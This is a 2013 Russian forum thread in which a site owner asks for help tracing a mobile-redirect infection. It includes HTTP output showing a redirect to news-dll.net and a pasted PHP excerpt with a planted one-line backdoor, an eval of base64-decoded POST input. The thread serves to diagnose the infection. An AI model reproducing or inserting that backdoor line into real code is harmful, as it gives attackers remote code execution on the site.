Вирус на сайте

yakes:
Яша опять прислал письмо :(
Опять то же самое, пишут что у меня "Мобильный редирект"
Ни как не могу ни че найти, сайт xtrackers . ru
Может кто то может увидеть этот вредоносный код?

Resolving xtrackers.ru... 31.31.192.190
Connecting to xtrackers.ru|31.31.192.190|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Server: nginx/0.8.54
Date: Sun, 10 Nov 2013 16:46:11 GMT
Content-Type: text/html; charset=cp1251
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://news-dll.net/?1&referer=xtrackers.ru
Content-Length: 0

yakes:
А как его найти? что мне с ним делать?

anser06:
servercraft, по ходу, у него на разные сайты редиректит.

yakes:
servercraft, ну а что именно искать в файлах то?

$relates_word = array ('e' => '[eеё]', 'r' => '[rг]', 't' => '[tт]', 'y' => '[yу]','u' => '[uи]','i' => '[i1l!]','o' => '[oо0]','p' => '[pр]','a' => '[aа]','s' => '[s5]','w' => 'w','q' => 'q','d' => 'd','f' => 'f','g' => '[gд]','h' => '[hн]','j' => 'j','k' => '[kк]','l' => '[l1i!]','z' => 'z','x' => '[xх%]','c' => '[cс]','v' => '[vuи]','b' => '[bвь]','n' => '[nпл]','m' => '[mм]','й' => '[йиu]','ц' => 'ц','у' => '[уy]','е' => '[еeё]','н' => '[нh]','г' => '[гr]','ш' => '[шwщ]','щ' => '[щwш]','з' => '[з3э]','х' => '[хx%]','ъ' => '[ъь]','ф' => 'ф','ы' => '(ы|ь[i1l!]?)','в' => '[вb]','а' => '[аa]','п' => '[пn]','р' => '[рp]','о' => '[оo0]','л' => '[лn]','д' => 'д','ж' => 'ж','э' => '[э3з]','я' => '[я]','ч' => '[ч4]','с' => '[сc]','м' => '[мm]','и' => '[иuй]','т' => '[тt]','ь' => '[ьb]','б' => '[б6]','ю' => '(ю|[!1il][oо0])','ё' => '[ёеe]','1' => '[1il!]','2' => '2','3' => '[3зэ]','4' => '[4ч]','5' => '[5s]','6' => '[6б]','7' => '7','8' => '8','9' => '9','0' => '[0оo]','_' => '_','#' => '#','%' => '[%x]','^' => '[^~]','(' => '[(]',')' => '[)]','=' => '=','.' => '[.]','-' => '-','[' => '[\[]');
if(!empty($_POST['ups'])) eval(base64_decode($_POST['ups']));
@setlocale(LC_ALL, array("ru_RU.CP1251", "ru_SU.CP1251", "ru_RU.KOI8-r", "ru_RU", "russian", "ru_SU", "ru"));